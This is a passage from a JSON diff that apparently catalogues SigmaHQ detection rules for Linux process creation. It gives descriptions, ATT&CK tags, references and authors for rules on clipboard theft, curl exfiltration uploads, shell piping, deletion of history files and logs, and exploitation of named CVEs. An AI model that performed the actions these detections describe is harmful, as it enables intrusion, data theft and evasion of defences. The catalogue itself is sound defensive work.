+ ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", + "value": "Clipboard Collection with Xclip Tool", + "meta": { + "refs": [ + "https://www.packetlabs.net/posts/clipboard-data-security/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_clipboard_collection.yml", + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "low", + "falsepositive": [ + "Legitimate usage of xclip tools." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "value": "Remove Scheduled Cron Task/Job", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_crontab_removal.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": 
"linux" + } + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", + "value": "Linux Crypto Mining Indicators", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" + ], + "tags": "No established tags", + "creation_date": "2021/10/26", + "filename": "proc_creation_lnx_crypto_mining.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "value": "Curl Usage on Linux", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_curl_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "low", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "value": "Atlassian Confluence CVE-2022-26134", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "value": "Apache Spark Shell Command Injection - ProcessCreation", + "meta": { + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ], + "creation_date": "2022/07/20", + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects potential overwriting and deletion of a file using DD.", + "uuid": "2953194b-e33c-4859-b9e8-05948c167447", + "value": "DD File Overwrite", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_dd_file_overwrite.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "low", + "falsepositive": [ + "Any user deleting files that way." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", + "value": "Linux Doas Tool Execution", + "meta": { + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2022/01/20", + "filename": "proc_creation_lnx_doas_execution.yml", + "author": "Sittikorn S, Teoderick Contreras", + "level": "low", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "value": "File and Directory Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2020/10/19", + "filename": 
"proc_creation_lnx_file_and_directory_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", + "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "value": "File Deletion", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_lnx_file_deletion.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "value": "Install Root Certificate", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_lnx_install_root_certificate.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "low", + "falsepositive": [ + 
"Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", + "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", + "value": "Local System Accounts Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_lnx_local_account.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings", + "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", + "value": "Local Groups Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_lnx_local_groups.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local or remote network services.", + "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", + "value": "Linux Network Service Scanning", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/10/21", + "filename": "proc_creation_lnx_network_service_scanning.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "value": "Nohup Execution", + "meta": { + "refs": [ + "https://gtfobins.github.io/gtfobins/nohup/", + "https://en.wikipedia.org/wiki/Nohup", + 
"https://www.computerhope.com/unix/unohup.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" + ], + "tags": "No established tags", + "creation_date": "2022/06/06", + "filename": "proc_creation_lnx_nohup.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Administrators or installed processes that leverage nohup" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "value": "OMIGOD SCX RunAsProvider ExecuteScript", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "high", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider ExecuteScript." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "high", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects process discovery commands. 
Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "value": "Process Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_process_discovery.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects setting proxy configuration", + "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "value": "Connection Proxy", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1090/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1090" + ], + "creation_date": "2020/06/17", + "filename": "proc_creation_lnx_proxy_connection.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects python spawning a pretty tty", + "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", + "value": "Python Spawning Pretty TTY", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_python_pty_spawn.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the enumeration of other remote systems.", + "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "value": "Linux Remote System Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2020/10/22", + "filename": "proc_creation_lnx_remote_system_discovery.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", + "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "value": "Scheduled Cron Task/Job - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_schedule_task_job_cron.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "value": "Security Software Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_security_software_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects disabling security tools", + "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "value": "Disabling Security Tools", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/06/17", + "filename": "proc_creation_lnx_security_tools_disabling.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "value": "Disable Or Stop Services", + "meta": { + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_services_stop_and_disable.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "value": "Setuid and Setgid", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" + ], + 
"tags": [ + "attack.persistence" + ], + "creation_date": "2020/06/16", + "filename": "proc_creation_lnx_setgid_setuid.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", + "value": "Sudo Privilege Escalation CVE-2019-14287", + "meta": { + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ], + "creation_date": "2019/10/15", + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects chmod targeting files in abnormal directory paths.", + "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "value": "Chmod Suspicious Directory", + "meta": { + "refs": [ + "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_susp_chmod_directories.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE 
@scythe_io", + "level": "medium", + "falsepositive": [ + "Admin changing file permissions." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "value": "Suspicious Curl File Upload - Linux", + "meta": { + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_susp_curl_fileupload.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects a suspicious curl process start on linux with set useragent options", + "uuid": "b86d356d-6093-443d-971c-9b07db583c68", + "value": "Suspicious Curl Change User Agents - Linux", + "meta": { + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_susp_curl_useragent.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + 
"Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "value": "History File Deletion", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_susp_history_delete.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "value": "Print History File Contents", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_susp_history_recon.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" 
+ } + }, + { + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "value": "Interactive Bash Suspicious Children", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/14", + "filename": "proc_creation_lnx_susp_interactive_bash.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects java process spawning suspicious children", + "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", + "value": "Suspicious Java Children Processes", + "meta": { + "refs": [ + "https://www.tecmint.com/different-types-of-linux-shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_susp_java_children.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", + "uuid": "880973f3-9708-491c-a77b-2a35a1921158", + "value": "Linux Shell Pipe to Shell", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2022/03/14", + "filename": "proc_creation_lnx_susp_pipe_shell.yml", 
+ "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "value": "Linux Recon Indicators", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_susp_recon_indicators.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects system information discovery commands", + "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "value": "System Information Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + 